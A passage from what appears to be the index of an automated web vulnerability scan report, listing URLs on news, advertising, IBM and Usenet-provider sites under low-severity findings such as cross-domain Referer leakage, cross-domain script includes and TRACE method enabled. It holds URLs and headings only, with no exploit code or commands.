13.18. http://www.ibm.com/developerworks/rational/library/08/0325_segal/index.html
13.19. http://www.ibm.com/developerworks/tivoli/library/s-csscript/
13.20. http://www.ibm.com/developerworks/tivoli/library/s-csscript/
13.21. http://www.ibm.com/search/csass/search/
13.22. http://www.jcp.org/en/home/index
13.23. http://www.jcp.org/en/jsr/detail
13.24. https://www.mailjet.com/signup
13.25. http://www.ted.com/js/library.min.js
13.26. http://www.tmz.com/2011/09/02/ncis-actor-my-neighbor-went-off-about-my-dead-mother-david-fisher-self-defense-police/
13.27. http://www.tmz.com/2011/09/15/michaele-salahi-journey-neal-schon-affair-years-in-the-making-tareq-cheating-marriage-white-house-crashers-real-housewives-of-dc/
13.28. http://www.tmz.com/2011/09/16/justin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-in-bed-wearing-panties-on-head-leaked-pictures-explicit-cell-phone/
13.29. http://www.tmz.com/2011/09/16/nancy-grace-dancing-tmz-live-video-partner-tristan-macmanus-dancing-with-the-stars/
13.30. http://www.tmz.com/2011/09/16/ron-artest-name-change-official-metta-world-peace-legal-judge-petition-granted-lakers/
13.31. http://www.tmz.com/signin/
13.32. http://www.toofab.com/2011/09/15/ashlee-simpson-vincent-piazza-boardwalk-empire-premiere-photos/
13.33. http://www.toofab.com/2011/09/16/exclusive-melissa-rivers-splits-with-boyfriend/
13.34. http://www.usenetbinaries.com/l/newsgroups.html
13.35. http://www.usenetserver.com/en/support.php
14. Source code disclosure
14.1. http://info.mailtraq.com/v/js/ncBwHlpr.js
14.2. http://resources.infolinks.com/js/221.3.5b/infolinks.js
14.3. http://resources.infolinks.com/js/222.0.4/infolinks.js
14.4. http://www.enstarllc.com/v/js/ncBwHlpr.js
14.5. http://www.ibm.com/developerworks/dwtagg/css/h3/dogear.css
14.6. http://www.mailtraq.com/v/js/ncBwHlpr.js
14.7. http://www.ted.com/js/library.min.js
15. Referer-dependent response
15.1. http://adnxs.revsci.net/imp
15.2. http://c.brightcove.com/services/viewer/federated_f9
15.3. http://cpanel.app9.hubspot.com/Inactive.aspx
15.4. http://dg.specificclick.net/
15.5. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9
15.6. http://pixel.adsafeprotected.com/jspix
15.7. http://weather.yahoo.com/badge/
15.8. http://www.facebook.com/plugins/activity.php
15.9. http://www.facebook.com/plugins/like.php
15.10. http://www.facebook.com/plugins/likebox.php
15.11. http://www.mailtraq.com/30day
15.12. http://www.westhost.com/images/bluegradbg.gif
15.13. http://www.westhost.com/images/boxtopbackground.gif
16. Cross-domain POST
17. Cross-domain Referer leakage
17.1. http://3ps.go.com/DynamicAd
17.2. http://a.collective-media.net/cmadj/cm.rev_bostonherald/
17.3. http://abc.csar.go.com/DynamicCSAd
17.4. http://abc.csar.go.com/DynamicCSAd
17.5. https://accounts.usenetserver.com/register/index.php
17.6. http://ad.afy11.net/ad
17.7. http://ad.doubleclick.net/adi/N4682.126265.CASALEMEDIA/B5564795.9
17.8. http://ad.doubleclick.net/adi/N6092.yahoo.com/B5098223.106
17.9. http://ad.doubleclick.net/adi/N884.abc.com/B5709785.10
17.10. http://ad.doubleclick.net/adj/N5295.SD128132N5295SN0/B5761718.3
17.11. http://ad.doubleclick.net/adj/cm.rev_bostonherald/
17.12. http://ad.doubleclick.net/adj/tconf.ted/homepage
17.13. http://ad.doubleclick.net/adj/tmz.category.wb.dart/black_swan
17.14. http://ad.doubleclick.net/adj/tmz.category.wb.dart/celebrity_hookups
17.15. http://ad.doubleclick.net/adj/tmz.category.wb.dart/celebrity_justice
17.16. http://ad.doubleclick.net/adj/tmz.category.wb.dart/dwts
17.17. http://ad.doubleclick.net/adj/tmz.ros.wb.dart/
17.18. http://ad.doubleclick.net/adj/tmz.toofab.wb.dart/
17.19. http://ad.turn.com/server/ads.js
17.20. https://admin.usenetbinaries.com/cgi-bin/signup
17.21. http://ads.adsonar.com/adserving/getAds.jsp
17.22. http://ads.bluelithium.com/st
17.23. http://ads.dotomi.com/ads_smokey_pure.php
17.24. http://ads.tw.adsonar.com/adserving/getAds.jsp
17.25. http://adunit.cdn.auditude.com/flash/modules/display/auditudeDisplayLib.js
17.26. http://afe.specificclick.net/
17.27. http://afe.specificclick.net/
17.28. http://afe.specificclick.net/
17.29. http://as.casalemedia.com/j
17.30. http://as.casalemedia.com/j
17.31. http://as.casalemedia.com/j
17.32. http://as1.suitesmart.com/99917/G15493.js
17.33. http://attuverseoffers.com/tv_hsi_bundles/includes/xml/offersS20.xml
17.34. http://attuverseoffers.com/tv_hsi_bundles/index.php
17.35. http://b3.mookie1.com/2/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom3
17.36. http://bh.heraldinteractive.com/includes/processAds.bg
17.37. http://bh.heraldinteractive.com/includes/processAds.bg
17.38. http://bh.heraldinteractive.com/includes/processAds.bg
17.39. http://bostonherald.com/news/columnists/view.bg
17.40. http://bostonherald.com/news/national/
17.41. http://bostonherald.com/news/regional/view.bg
17.42. http://bostonherald.com/news/regional/view.bg
17.43. http://bostonherald.com/projects/your_tax_dollars.bg
17.44. http://bostonherald.com/track/inside_track/view.bg
17.45. http://bostonheraldnie.newspaperdirect.com/epaper/Services/HomePageHandler.ashx
17.46. http://bostonheraldnie.newspaperdirect.com/epaper/Services/HomePageHandler.ashx
17.47. http://bostonheraldnie.newspaperdirect.com/epaper/Services/HomePageHandler.ashx
17.48. http://bostonheraldnie.newspaperdirect.com/epaper/homepage_v2.aspx
17.49. http://bp.specificclick.net/
17.50. http://ca.rtb.prod2.invitemedia.com/build_creative
17.51. http://ca.rtb.prod2.invitemedia.com/build_creative
17.52. http://ca.rtb.prod2.invitemedia.com/build_creative
17.53. http://ca.rtb.prod2.invitemedia.com/build_creative
17.54. http://ca.rtb.prod2.invitemedia.com/build_creative
17.55. http://ca.rtb.prod2.invitemedia.com/build_creative
17.56. http://cache2-scripts.pressdisplay.com/res/WebResource.ashx
17.57. http://cdn.polls.tmz.com/polls/34613/iframe
17.58. http://cdn.polls.tmz.com/polls/34614/iframe
17.59. http://choices.truste.com/ca
17.60. http://choices.truste.com/ca
17.61. http://cim.meebo.com/cim
17.62. http://cm.g.doubleclick.net/pixel
17.63. http://cm.g.doubleclick.net/pixel
17.64. http://cm.g.doubleclick.net/pixel
17.65. http://cplads.appspot.com/file/104441593408970093297/AIO_300x250_6_27_2011/1309205690/GoogleForm_dp.html
17.66. http://dg.specificclick.net/
17.67. http://duckduckgo.com/
17.68. http://googleads.g.doubleclick.net/pagead/ads
17.69. http://googleads.g.doubleclick.net/pagead/ads
17.70. http://googleads.g.doubleclick.net/pagead/ads
17.71. http://googleads.g.doubleclick.net/pagead/ads
17.72. http://googleads.g.doubleclick.net/pagead/ads
17.73. http://googleads.g.doubleclick.net/pagead/ads
17.74. http://googleads.g.doubleclick.net/pagead/ads
17.75. http://googleads.g.doubleclick.net/pagead/ads
17.76. http://googleads.g.doubleclick.net/pagead/ads
17.77. http://googleads.g.doubleclick.net/pagead/ads
17.78. http://googleads.g.doubleclick.net/pagead/ads
17.79. http://googleads.g.doubleclick.net/pagead/ads
17.80. http://googleads.g.doubleclick.net/pagead/ads
17.81. http://googleads.g.doubleclick.net/pagead/ads
17.82. http://googleads.g.doubleclick.net/pagead/ads
17.83. http://googleads.g.doubleclick.net/pagead/ads
17.84. http://googleads.g.doubleclick.net/pagead/ads
17.85. http://googleads.g.doubleclick.net/pagead/ads
17.86. http://googleads.g.doubleclick.net/pagead/ads
17.87. http://googleads.g.doubleclick.net/pagead/ads
17.88. http://googleads.g.doubleclick.net/pagead/ads
17.89. http://googleads.g.doubleclick.net/pagead/ads
17.90. http://googleads.g.doubleclick.net/pagead/ads
17.91. http://googleads.g.doubleclick.net/pagead/ads
17.92. http://googleads.g.doubleclick.net/pagead/ads
17.93. http://googleads.g.doubleclick.net/pagead/ads
17.94. http://googleads.g.doubleclick.net/pagead/ads
17.95. http://googleads.g.doubleclick.net/pagead/ads
17.96. http://googleads.g.doubleclick.net/pagead/ads
17.97. http://ib.adnxs.com/ptj
17.98. http://images.search.yahoo.com/search/images
17.99. http://info.desktone.com/gaw.hosted.virtual.desktop.free.trial.html
17.100. http://l.yimg.com/l/social_buttons/facebook-share-iframe.php
17.101. http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/news/national/remembering_911/home/L24/1480354666/Right/BostonHerald/Pictopia_160x600_House/Pictopia-160x600.jpg/4d686437616b35776e72734144666853
17.102. http://omg.yahoo.com/search
17.103. http://omg.yahoo.com/xhr/ad/LREC/2115806991
17.104. http://omg.yahoo.com/xhr/ad/LREC/2115806991
17.105. http://omg.yahoo.com/xhr/ad/LREC/2115823648
17.106. http://omg.yahoo.com/xhr/ad/MREC/2115823648
17.107. http://omg.yahoo.com/xhr/relatedsearch/
17.108. http://pagead2.googlesyndication.com/pagead/ads
17.109. http://pagead2.googlesyndication.com/pagead/ads
17.110. http://pagead2.googlesyndication.com/pagead/ads
17.111. http://pagead2.googlesyndication.com/pagead/ads
17.112. http://pagead2.googlesyndication.com/pagead/ads
17.113. http://pro.tweetmeme.com/button.js
17.114. http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0001075460/bnum=1532848/cstr=1532848=_4e73f209,4424437366,766159%5E1075460%5E1184%5E0,1_/xsxdata=$xsxdata/xsinvid=0/imptid=AS444cf0ddbfae44a9a3987f5d857df653
17.115. http://search.yahoo.com/search
17.116. http://secure-us.imrworldwide.com/ocr/e
17.117. http://showadsak.pubmatic.com/AdServer/AdServerServlet
17.118. http://showadsak.pubmatic.com/AdServer/AdServerServlet
17.119. http://showadsak.pubmatic.com/AdServer/AdServerServlet
17.120. http://showadsak.pubmatic.com/AdServer/AdServerServlet
17.121. http://showadsak.pubmatic.com/AdServer/AdServerServlet
17.122. http://showadsak.pubmatic.com/AdServer/AdServerServlet
17.123. http://showadsak.pubmatic.com/AdServer/AdServerServlet
17.124. http://showadsak.pubmatic.com/AdServer/AdServerServlet
17.125. http://showadsak.pubmatic.com/AdServer/AdServerServlet
17.126. http://showadsak.pubmatic.com/AdServer/AdServerServlet
17.127. http://showadsak.pubmatic.com/AdServer/AdServerServlet
17.128. http://showadsak.pubmatic.com/AdServer/AdServerServlet
17.129. http://showadsak.pubmatic.com/AdServer/AdServerServlet
17.130. http://showadsak.pubmatic.com/AdServer/AdServerServlet
17.131. http://showadsak.pubmatic.com/AdServer/AdServerServlet
17.132. http://us.adserver.yahoo.com/a
17.133. http://weather.yahoo.com/badge/
17.134. http://www-01.ibm.com/support/docview.wss
17.135. http://www-03.ibm.com/innovation/us/watson/images/arrows/arrows.png
17.136. http://www-142.ibm.com/software/products/us/en/search
17.137. http://www-304.ibm.com/support/operations/us/en/invoicespayments
17.138. http://www-304.ibm.com/support/operations/us/en/orderdelivery
17.139. http://www-935.ibm.com/services/us/igs/smarterdatacenter.html
17.140. http://www.actvalue.com/pages/asp/editorial/ps_rfid.asp
17.141. http://www.att.com/media/gvp/gvpUtils.js
17.142. http://www.bostonherald.com/mobile/view.bg
17.143. http://www.bradsdeals.com/dealsoftheday/subscribe/b
17.144. http://www.easynews.com/
17.145. http://www.facebook.com/plugins/activity.php
17.146. http://www.facebook.com/plugins/facepile.php
17.147. http://www.facebook.com/plugins/likebox.php
17.148. http://www.giganews.com/
17.149. https://www.giganews.com/signup/billing.html
17.150. http://www.google.com/search
17.151. http://www.google.com/search
17.152. http://www.ibm.com/Search/
17.153. http://www.ibm.com/developerworks/forums/thread.jspa
17.154. http://www.ibm.com/developerworks/niagara/jsp/AuthValid.jsp
17.155. http://www.ibm.com/search/csass/search
17.156. http://www.ibm.com/search/csass/search/
17.157. http://www.itoncommand.com/GetAQuote.aspx
17.158. http://www.jcp.org/en/jsr/detail
17.159. http://www.matrix42.com/downloads/wp-vdi-demystified/
17.160. http://www.mokafive.com/BetterWayVDI
17.161. http://www.redbooks.ibm.com/cgi-bin/searchsite.cgi
17.162. http://www.ted.com/js/library.min.js
17.163. http://www.ted.com/search
17.164. http://www.thundernews.com/
17.165. https://www.thundernews.com/billinginfo.php
17.166. http://www.tmz.com/2011/09/15/michaele-salahi-journey-neal-schon-affair-years-in-the-making-tareq-cheating-marriage-white-house-crashers-real-housewives-of-dc/
17.167. http://www.tmz.com/2011/09/16/justin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-in-bed-wearing-panties-on-head-leaked-pictures-explicit-cell-phone/
17.168. http://www.tmz.com/2011/09/16/ron-artest-name-change-official-metta-world-peace-legal-judge-petition-granted-lakers/
17.169. http://www.usenetbinaries.com/l/newsgroups.html
18. Cross-domain script include
18.1. http://3ps.go.com/DynamicAd
18.2. http://abc.csar.go.com/DynamicCSAd
18.3. https://accounts.usenetserver.com/register/index.php
18.4. http://ad.afy11.net/ad
18.5. http://ad.doubleclick.net/adi/N4682.126265.CASALEMEDIA/B5564795.9
18.6. http://ad.doubleclick.net/adi/N6092.yahoo.com/B5098223.106
18.7. http://ad.doubleclick.net/adi/N884.abc.com/B5709785.10
18.8. https://admin.usenetbinaries.com/cgi-bin/signup
18.9. http://ads.pubmatic.com/HostedThirdPartyPixels/TF/ae_12232010.html
18.10. http://afe.specificclick.net/
18.11. http://attuverseoffers.com/tv_hsi_bundles/index.php
18.12. http://beta.abc.go.com/shows/charlies-angels
18.13. http://beta.abc.go.com/shows/charlies-angels/bios
18.14. http://beta.abc.go.com/shows/charlies-angels/bios/eve-french
18.15. http://bgs-soft.com/Products_Sgagent.asp
18.16. http://bgs-soft.com/UsAndThem.asp
18.17. http://bh.heraldinteractive.com/includes/processAds.bg
18.18. http://bh.heraldinteractive.com/includes/processAds.bg
18.19. http://bh.heraldinteractive.com/includes/processAds.bg
18.20. http://blekko.com/
18.21. http://blekko.com/ws/radius+server
18.22. http://blog.ted.com/
18.23. http://bostonherald.com/entertainment/
18.24. http://bostonherald.com/news/
18.25. http://bostonherald.com/news/columnists/view.bg
18.26. http://bostonherald.com/news/national/
18.27. http://bostonherald.com/news/regional/view.bg
18.28. http://bostonherald.com/projects/your_tax_dollars.bg
18.29. http://bostonherald.com/track/
18.30. http://bostonherald.com/track/inside_track/view.bg
18.31. http://bostonherald.com/track/inside_track/view/20110907sox_with_heels/
18.32. http://bostonherald.com/track/star_tracks/view/20110915cameron_and_tyler_winklevoss_to_star_in_tv_ad/srvc=track&position=also
18.33. http://bostonheraldnie.newspaperdirect.com/epaper/homepage_v2.aspx
18.34. http://bostonheraldnie.newspaperdirect.com/epaper/viewer.aspx
18.35. http://cdn.optmd.com/V2/80181/197812/index.html
18.36. http://cdn.polls.tmz.com/polls/34613/iframe
18.37. http://cdn.polls.tmz.com/polls/34614/iframe
18.38. http://cplads.appspot.com/file/104441593408970093297/AIO_300x250_6_27_2011/1309205690/GoogleForm_dp.html
18.39. http://d14.zedo.com//ads3/k/951/887163/3853/1000007/i.js
18.40. http://forums.cpanel.net/calendar.php
18.41. http://forums.cpanel.net/f43/connection-imap-server-failed-96021.html
18.42. http://freeradius.org/
18.43. http://gallery.pictopia.com/bostonherald/
18.44. http://googleads.g.doubleclick.net/pagead/ads
18.45. http://googleads.g.doubleclick.net/pagead/ads
18.46. http://info.desktone.com/cloudhosted.virtual.desktop.free.trial.html
18.47. http://info.desktone.com/gaw.hosted.virtual.desktop.free.trial.html
18.48. http://info.mailtraq.com/imap
18.49. http://info.mailtraq.com/wac
18.50. http://l.yimg.com/l/social_buttons/facebook-share-iframe.php
18.51. http://members.westhost.com/v2/AddFavorites.js
18.52. http://members.westhost.com/v2/images/Icon-Install.gif
18.53. http://members.westhost.com/v2/images/bgmembers.gif
18.54. http://members.westhost.com/v2/images/diagram_imap.gif
18.55. http://members.westhost.com/v2/images/diagram_pop3.gif
18.56. http://members.westhost.com/v2/images/dotted_underline.gif
18.57. http://members.westhost.com/v2/images/hi_imap.gif
18.58. http://members.westhost.com/v2/images/larrow.gif
18.59. http://members.westhost.com/v2/images/printpage.gif
18.60. http://members.westhost.com/v2/images/v1_checkbox.gif
18.61. http://members.westhost.com/v2/menu_settings_members.js
18.62. http://members.westhost.com/v2/menu_styles.css
18.63. http://members.westhost.com/v2/scripts/cbrowser_dom.js
18.64. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/admtmz/ros/300x250/jx/ss/a/1290982822@x15
18.65. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/admtmz/ros/728x90/jx/ss/a/1708544459@Top1
18.66. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com//your_tax_dollars_at_work@Top,Bottom!Bottom
18.67. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com//your_tax_dollars_at_work@Top,Bottom!Top
18.68. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/entertainment/home@Top,Middle,Middle1,Bottom!Bottom
18.69. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/entertainment/home@Top,Middle,Middle1,Bottom!Middle1
18.70. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/entertainment/home@Top,Middle,Middle1,Bottom!Top
18.71. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/mobile/home/1321816395@x12
18.72. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/mobile/home/1359771821@x12
18.73. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/mobile/home/1779944804@x11
18.74. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/mobile/home/1969994821@x11
18.75. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/columnists/article@Top,Right,Middle,Middle1,Bottom!Middle
18.76. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/columnists/article@Top,Right,Middle,Middle1,Bottom!Middle1
18.77. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/columnists/article@Top,Right,Middle,Middle1,Bottom!Right
18.78. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/columnists/article@Top,Right,Middle,Middle1,Bottom!Top
18.79. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Bottom
18.80. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Middle
18.81. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Middle
18.82. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Middle1
18.83. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Middle1
18.84. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Top
18.85. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Top
18.86. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,x14,x15,Middle,Middle1,Middle2,Bottom!Bottom
18.87. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,x14,x15,Middle,Middle1,Middle2,Bottom!Middle1
18.88. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,x14,x15,Middle,Middle1,Middle2,Bottom!Top
18.89. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/national/remembering_911/home@Top,Middle,Middle1,Right,Bottom!Bottom
18.90. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/national/remembering_911/home@Top,Middle,Middle1,Right,Bottom!Middle
18.91. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/national/remembering_911/home@Top,Middle,Middle1,Right,Bottom!Middle1
18.92. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/national/remembering_911/home@Top,Middle,Middle1,Right,Bottom!Top
18.93. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Bottom!Middle
18.94. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Bottom!Right
18.95. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Bottom!Top
18.96. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/sports/home@Top,x14,x15,Middle,Middle1,Middle2,Bottom!Middle
18.97. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Bottom
18.98. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle
18.99. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle
18.100. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle
18.101. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle1
18.102. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Top
18.103. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/inside_track/article@Top,Right,Bottom!Bottom
18.104. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/inside_track/article@Top,Right,Bottom!Right
18.105. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/inside_track/article@Top,Right,Bottom!Top
18.106. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/inside_track/article@Top,Right,Middle,Bottom!Bottom
18.107. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/inside_track/article@Top,Right,Middle,Bottom!Middle
18.108. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/inside_track/article@Top,Right,Middle,Bottom!Right
18.109. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/inside_track/article@Top,Right,Middle,Bottom!Top
18.110. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/star_tracks/article@Top,Right,Bottom!Bottom
18.111. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/star_tracks/article@Top,Right,Bottom!Right
18.112. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/star_tracks/article@Top,Right,Bottom!Top
18.113. http://omg.yahoo.com/
18.114. http://omg.yahoo.com/photos/what-were-they-thinking/5203
18.115. http://pro.tweetmeme.com/button.js
18.116. http://r1-ads.ace.advertising.com/site=791296/size=300250/u=2/bnum=67593853/hr=0/hl=12/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=
18.117. http://r1-ads.ace.advertising.com/site=804034/size=728090/u=2/bnum=48830520/hr=0/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftag.admeld.com%252Fad%252Fiframe%252F221%252Ftmz%252F728x90%252Fhomepage_btf%253Ft%253D1316238825238%2526tz%253D300%2526m%253D0%2526hu%253D%2526ht%253Djs%2526hp%253D0%2526fo%253D%2526url%253Dhttp%25253A%25252F%25252Fwww.tmz.com%25252F%2526refer%253D
18.118. http://squirrelmail.org/index.php
18.119. http://squirrelmail.org/plugins.php
18.120. http://squirrelmail.org/support/
18.121. http://squirrelmail.org/wiki/MailServerIMAPProblem
18.122. http://us.adserver.yahoo.com/a
18.123. http://weather.yahoo.com/badge/
18.124. http://www-304.ibm.com/support/operations/us/en/invoicespayments
18.125. http://www-304.ibm.com/support/operations/us/en/orderdelivery
18.126. http://www.actvalue.com/
18.127. http://www.actvalue.com/pages/asp/editorial/ps_rfid.asp
18.128. http://www.alepo.com/isp-billing.shtml
18.129. http://www.alepo.com/radius-server.shtml
18.130. http://www.alepo.com/wifi.shtml
18.131. http://www.aradial.com/
18.132. http://www.att.com/u-verse/availability/
18.133. http://www.bostonherald.com/mobile/
18.134. http://www.bostonherald.com/mobile/info.bg
18.135. http://www.bostonherald.com/mobile/view.bg
18.136. http://www.bostonherald.com/news/
18.137. http://www.bradsdeals.com/dealsoftheday/subscribe/b
18.138. http://www.courier-mta.org/imap/
18.139. http://www.courier-mta.org/imap/header.html
18.140. http://www.cpanel.net/
18.141. http://www.desktone.com/
18.142. http://www.disenter.com/disenter.css
18.143. http://www.disenter.com/favicon.ico
18.144. http://www.elfqrin.com/hacklab/pages/nntpserv.php
18.145. http://www.facebook.com/plugins/activity.php
18.146. http://www.facebook.com/plugins/facepile.php
18.147. http://www.facebook.com/plugins/likebox.php
18.148. http://www.giganews.com/
18.149. https://www.giganews.com/signup/
18.150. https://www.giganews.com/signup/billing.html
18.151. http://www.ibm.com/developerworks/dwtagg/js/dojo/resources/blank.gif
18.152. http://www.ibm.com/developerworks/forums/thread.jspa
18.153. http://www.ibm.com/developerworks/java/
18.154. http://www.ibm.com/developerworks/java/find/standards/
18.155. http://www.ibm.com/developerworks/niagara/jsp/AuthValid.jsp
18.156. http://www.ibm.com/developerworks/rational/library/08/0325_segal/index.html
18.157. http://www.ibm.com/developerworks/tivoli/library/s-csscript/
18.158. http://www.ibm.com/products/us/en/
18.159. http://www.ibm.com/search/csass/search/
18.160. http://www.ibm.com/us/en/
18.161. http://www.interlinknetworks.com/
18.162. http://www.interlinknetworks.com/applications.htm
18.163. http://www.interlinknetworks.com/pricing.htm
18.164. http://www.interlinknetworks.com/products/on2-4-1radseries.htm
18.165. http://www.interlinknetworks.com/rad.htm
18.166. http://www.interlinknetworks.com/services.htm
18.167. http://www.mailjet.com/
18.168. http://www.mailjet.com/features
18.169. http://www.mailjet.com/pricing
18.170. https://www.mailjet.com/signup
18.171. http://www.mailtraq.com/30day
18.172. http://www.matrix42.com/fileadmin/jScripts/video_box.js
18.173. http://www.mokafive.com/BetterWayVDI
18.174. http://www.mokafive.com/products/compare-mokafive.php
18.175. http://www.mokafive.com/products/products-overview.php
18.176. http://www.mokafive.com/solutions/desktop-and-laptop-management.php
18.177. http://www.mokafive.com/solutions/outsourcing.php
18.178. http://www.mokafive.com/solutions/solutions-overview.php
18.179. http://www.radius-server.net/
18.180. http://www.spotngo.ca/
18.181. http://www.ted.com/
18.182. http://www.ted.com/initiatives
18.183. http://www.ted.com/search
18.184. http://www.ted.com/themes/browse
18.185. http://www.ted.com/webcast/archive/event/ibmwatson
18.186. http://www.thundernews.com/
18.187. http://www.thundernews.com/signup.php
18.188. https://www.thundernews.com/billinginfo.php
18.189. http://www.tmz.com/
18.190. http://www.tmz.com/2011/09/02/ncis-actor-my-neighbor-went-off-about-my-dead-mother-david-fisher-self-defense-police/
18.191. http://www.tmz.com/2011/09/15/michaele-salahi-journey-neal-schon-affair-years-in-the-making-tareq-cheating-marriage-white-house-crashers-real-housewives-of-dc/
18.192. http://www.tmz.com/2011/09/16/justin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-in-bed-wearing-panties-on-head-leaked-pictures-explicit-cell-phone/
18.193. http://www.tmz.com/2011/09/16/nancy-grace-dancing-tmz-live-video-partner-tristan-macmanus-dancing-with-the-stars/
18.194. http://www.tmz.com/2011/09/16/ron-artest-name-change-official-metta-world-peace-legal-judge-petition-granted-lakers/
18.195. http://www.tmz.com/reset-password/
18.196. http://www.tmz.com/signin/
18.197. http://www.toofab.com/
18.198. http://www.toofab.com/2011/09/15/ashlee-simpson-vincent-piazza-boardwalk-empire-premiere-photos/
18.199. http://www.toofab.com/2011/09/16/exclusive-melissa-rivers-splits-with-boyfriend/
18.200. http://www.toofab.com/category/celeb-couples/
18.201. http://www.toofab.com/news/
18.202. http://www.usenetbinaries.com/l/newsgroups.html
18.203. http://www.virtuecom.com/
18.204. http://www.westhost.com/images/bluegradbg.gif
18.205. http://www.westhost.com/images/boxtopbackground.gif
19. TRACE method is enabled
19.1. http://72.3.253.234/
19.2. http://ads.pubmatic.com/
19.3. http://afe.specificclick.net/
19.4. http://amch.questionmarket.com/
19.5. http://aud.pubmatic.com/
19.6. http://beta.abc.go.com/
19.7. http://bh.heraldinteractive.com/
19.8. http://bigapple.contextuads.com/
19.9. http://bp.specificclick.net/
19.10. http://cache.specificmedia.com/
19.11. http://cdn.video.abc.com/
19.12. http://cheetah.vizu.com/
19.13. http://dp.33across.com/
